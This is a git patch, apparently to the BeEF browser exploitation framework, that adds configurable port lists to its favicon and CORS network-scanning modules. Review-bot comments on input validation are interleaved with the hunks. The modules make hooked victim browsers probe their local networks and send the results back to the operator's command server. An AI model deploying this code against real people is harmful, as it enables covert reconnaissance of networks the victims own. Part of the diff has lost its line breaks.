From 0afac0171d195e5aad23c83c4f93593676be401f Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sat, 7 Feb 2015 12:51:00 +0000
Subject: [PATCH] Make ports configurable
---
 .../ui/panel/tabs/ZombieTabNetwork.js | 90 ++++++++++++++-----
 .../network/cross_origin_scanner/command.js | 19 ++--
 .../network/cross_origin_scanner/module.rb | 1 +
 modules/network/get_http_servers/command.js | 11 ++-
 modules/network/get_http_servers/module.rb | 2 +-
 5 files changed, 94 insertions(+), 29 deletions(-)
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
index 9effc1d18..1d5fc3103 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
@@ -174,10 +174,15 @@ ZombieTab_Network = function(zombie) {
 handler: function() {
 var mod_name = "get_http_servers";
 var mod_id = get_module_id(mod_name);
- commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers [ports: '+ports+'] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":"common"}),
+ data: JSON.stringify({"ipRange":"common","ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
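Review bot: The value returned by `prompt()` is only checked for emptiness before it is serialised into the `ports` field of the module request, so entries that are not port numbers (letters, stray spaces, values above 65535) are passed on unchanged. The same five-line prompt-and-cancel block is pasted into every handler this patch touches (the hunks at -200, -290, -316, -365, -423, -515, -536, -617 and -639), which makes it easy for the copies to drift. A single helper that trims, validates and re-joins the list would cover both points. The handlers' bodies start and end outside these hunks, so where the helper should be declared is a guess.

```javascript
// Ask for a comma-separated port list; returns the normalised list,
// or null when the prompt is cancelled or any entry is not a port number.
function prompt_for_ports() {
	var answer = prompt("Enter ports to scan:", '80,8080');
	if (!answer) return null;
	var fields = answer.split(',');
	var valid = [];
	for (var n = 0; n < fields.length; n++) {
		var field = fields[n].replace(/^\s+|\s+$/g, '');
		if (!/^\d{1,5}$/.test(field) || +field < 1 || +field > 65535) return null;
		valid.push(field);
	}
	return valid.join(',');
}

// … in each handler, replacing the pasted prompt block …
var ports = prompt_for_ports();
if (!ports) {
	commands_statusbar.update_fail('Cancelled');
	return;
}
```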
@@ -200,12 +205,17 @@ ZombieTab_Network = function(zombie) {
 commands_statusbar.update_fail('Cancelled');
 return;
 }
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
 var mod_name = "get_http_servers";
 var mod_id = get_module_id(mod_name);
 commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":ip_range}),
+ data: JSON.stringify({"ipRange":ip_range,"ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
@@ -290,10 +300,15 @@ ZombieTab_Network = function(zombie) {
 handler: function() {
 var mod_name = "cross_origin_scanner";
 var mod_id = get_module_id(mod_name);
- commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses [ports: '+ports+'] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":"common"}),
+ data: JSON.stringify({"ipRange":"common","ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
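Review bot: The status text in the -200,12 hunk is left as `'Favicon scanning ' + ip_range + ' for web servers...'`, while every other handler changed by this patch gains a `[ports: …]` suffix, so this one scan gives the operator no confirmation of which port list was submitted. For consistency the line could read `commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers [ports: ' + ports + '] ...');`. The handler's body begins before the hunk and continues after it.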
@@ -316,12 +331,17 @@ ZombieTab_Network = function(zombie) {
 commands_statusbar.update_fail('Cancelled');
 return;
 }
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
 var mod_name = "cross_origin_scanner";
 var mod_id = get_module_id(mod_name);
- commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
+ commands_statusbar.update_sending('CORS scanning ' + ip_range + ' [ports: ' + ports + '] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":ip_range}),
+ data: JSON.stringify({"ipRange":ip_range,"ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
@@ -365,10 +385,15 @@ ZombieTab_Network = function(zombie) {
 iconCls: 'network-host-ctxMenu-host',
 handler: function() {
 var mod_id = get_module_id("get_http_servers");
- commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers [ports: '+ports+'] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
@@ -423,10 +448,15 @@ ZombieTab_Network = function(zombie) {
 iconCls: 'network-host-ctxMenu-host',
 handler: function() {
 var mod_id = get_module_id("cross_origin_scanner");
- commands_statusbar.update_sending('CORS scanning ' + ip + '...');
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('CORS scanning ' + ip + ' [ports: '+ports+'] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
@@ -515,10 +545,15 @@ ZombieTab_Network = function(zombie) {
 iconCls: 'network-host-ctxMenu-host',
 handler: function() {
 var mod_id = get_module_id("get_http_servers");
- commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers [ports: '+ports+'] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
@@ -536,11 +571,16 @@ ZombieTab_Network = function(zombie) {
 text: 'Network ('+class_c+'.0/24)',
 iconCls: 'network-host-ctxMenu-network',
 handler: function() {
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
 var mod_id = get_module_id("get_http_servers");
- commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers [ports: '+ports+'] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":ip_range}),
+ data: JSON.stringify({"ipRange":ip_range,"ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
@@ -617,10 +657,15 @@ ZombieTab_Network = function(zombie) {
 iconCls: 'network-host-ctxMenu-host',
 handler: function() {
 var mod_id = get_module_id("cross_origin_scanner");
- commands_statusbar.update_sending('CORS scanning ' + ip + '...');
+ var ports = prompt("Enter ports to scan:", '80,8080');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('CORS scanning ' + ip + ' [ports: '+ports+'] ...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
@@ -639,10 +684,15 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-network', handler: function() { var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip_range + '...'); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('CORS scanning ' + ip_range + ' [ports: '+ports+'] ...'); $jwterm.ajax({ contentType: 'application/json', - data: JSON.stringify({"ipRange":ip_range}), + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), dataType: 'json', type: 'POST', url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, @@ -842,7 +892,7 @@ ZombieTab_Network = function(zombie) { iconCls: 'network-host-ctxMenu-cors', handler: function () { var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip + '...'); + commands_statusbar.update_sending('CORS scanning ' + ip + ' [port: '+port+'] ...'); $jwterm.ajax({ contentType: 'application/json', data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}), diff --git a/modules/network/cross_origin_scanner/command.js b/modules/network/cross_origin_scanner/command.js index 382dc5f17..7758d0955 100644 --- a/modules/network/cross_origin_scanner/command.js +++ b/modules/network/cross_origin_scanner/command.js @@ -8,6 +8,7 @@ beef.execute(function() { var ips = new Array(); var ipRange = "<%= @ipRange %>"; + var ports = "<%= @ports %>"; var threads = "<%= @threads %>"; var wait = 2; @@ -16,6 +17,11 @@ beef.execute(function() { return; } + // set target ports + if (ports != null) { + ports = ports.split(','); + } + // set target IP addresses if (ipRange == 'common') { // use default IPs 
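Review bot: The `if (ports != null)` guard added in the -16,6 hunk of cross_origin_scanner/command.js is always true, because `ports` is initialised from the string literal `"<%= @ports %>"` in the -8,6 hunk; an empty or malformed option still goes through `split(',')` and yields entries such as `""` or `" 8080"`. Those entries are later concatenated into the URL and into the source text handed to `worker.queue` (the -94,19 hunk), so anything other than digits alters the generated statement rather than just the port. Parsing each entry to an integer in the range 1–65535 and stopping when none remain would close this; the identical block added to modules/network/get_http_servers/command.js needs the same treatment. The enclosing `beef.execute` callback starts and ends outside these hunks.

```javascript
// set target ports: keep only integer entries in the valid TCP range
var port_fields = ports.split(',');
var parsed_ports = [];
for (var n = 0; n < port_fields.length; n++) {
  var field = port_fields[n].replace(/^\s+|\s+$/g, '');
  var candidate = parseInt(field, 10);
  if (/^\d+$/.test(field) && candidate >= 1 && candidate <= 65535) {
    parsed_ports.push(candidate);
  }
}
if (parsed_ports.length == 0) {
  beef.debug("[Cross-Origin Scanner] No valid ports specified");
  return;
}
ports = parsed_ports;

// … unchanged: set target IP addresses …
```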
@@ -84,7 +90,7 @@ beef.execute(function() { } - beef.debug("[Cross-Origin Scanner] Starting CORS scan ("+ips.length+" URLs / "+threads+" workers)"); + beef.debug("[Cross-Origin Scanner] Starting CORS scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)"); // create worker queue var workers = new Array(); @@ -94,19 +100,20 @@ beef.execute(function() { // send CORS request to each IP var proto = 'http'; - var port = 80; for (var i=0; i < ips.length; i++) { var worker = workers[i % threads]; - var url = proto + '://' + ips[i] + ':' + port; - worker.queue('beef.net.cors.request(' + + for (var p=0; p < ports.length; p++) { + var url = proto + '://' + ips[i] + ':' + ports[p]; + worker.queue('beef.net.cors.request(' + '"GET", "'+url+'", "", function(response) {' + 'if (response != null && response["status"] != 0) {' + 'beef.debug("[Cross-Origin Scanner] Received response from '+url+': " + JSON.stringify(response));' + 'var title = response["body"].match("(.*?)<\\/title>"); if (title != null) title = title[1];' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ips[i]+'&port='+port+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ips[i]+'&port='+ports[p]+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + '}' + '});' - ); + ); + } } }); diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb index dc7804ddb..4eecf1d9e 100644 --- a/modules/network/cross_origin_scanner/module.rb +++ b/modules/network/cross_origin_scanner/module.rb 
@@ -33,6 +33,7 @@ class Cross_origin_scanner < BeEF::Core::Command def self.options return [ {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, + {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'} ] end diff --git a/modules/network/get_http_servers/command.js b/modules/network/get_http_servers/command.js index c1e9eabfb..3c67da129 100644 --- a/modules/network/get_http_servers/command.js +++ b/modules/network/get_http_servers/command.js @@ -9,12 +9,17 @@ beef.execute(function() { var ips = new Array(); var proto = 'http'; var ipRange = "<%= @ipRange %>"; - var port = "<%= @rport %>"; + var ports = "<%= @ports %>"; var timeout = "<%= @timeout %>"; var wait = "<%= @wait %>"; var threads = "<%= @threads %>"; var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png'); + // set target ports + if (ports != null) { + ports = ports.split(','); + } + // set target IP addresses if (ipRange == 'common') { // use default IPs @@ -116,7 +121,9 @@ beef.execute(function() { var worker = workers[u % threads]; // for each LAN IP address for (var i=0; i < ips.length; i++) { - worker.queue('checkFavicon("'+proto+'","'+ips[i]+'","'+port+'","'+urls[u]+'");'); + for (var p=0; p < ports.length; p++) { + worker.queue('checkFavicon("'+proto+'","'+ips[i]+'","'+ports[p]+'","'+urls[u]+'");'); + } } } diff --git a/modules/network/get_http_servers/module.rb b/modules/network/get_http_servers/module.rb index 31c5846ed..18819613d 100644 --- a/modules/network/get_http_servers/module.rb +++ b/modules/network/get_http_servers/module.rb 
@@ -9,7 +9,7 @@ class Get_http_servers < BeEF::Core::Command
 def self.options
 return [
 {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
- {'name' => 'rport', 'ui_label' => 'Port', 'value' => '80'},
+ {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'},
 {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'},
 {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '1'},
 {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'}
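Review bot: The `rport` option is replaced by `ports` with no fallback, so any caller or saved module configuration that still submits `rport` would presumably leave `@ports` empty when command.js is rendered; the code that binds options to the template is not visible here, so this is inferred. If the rename is intentional, a comment above the option would record the change of name and format, e.g. `# 'ports' (comma-separated list) replaces the former single-port 'rport' option`. `self.options` continues past the end of the hunk.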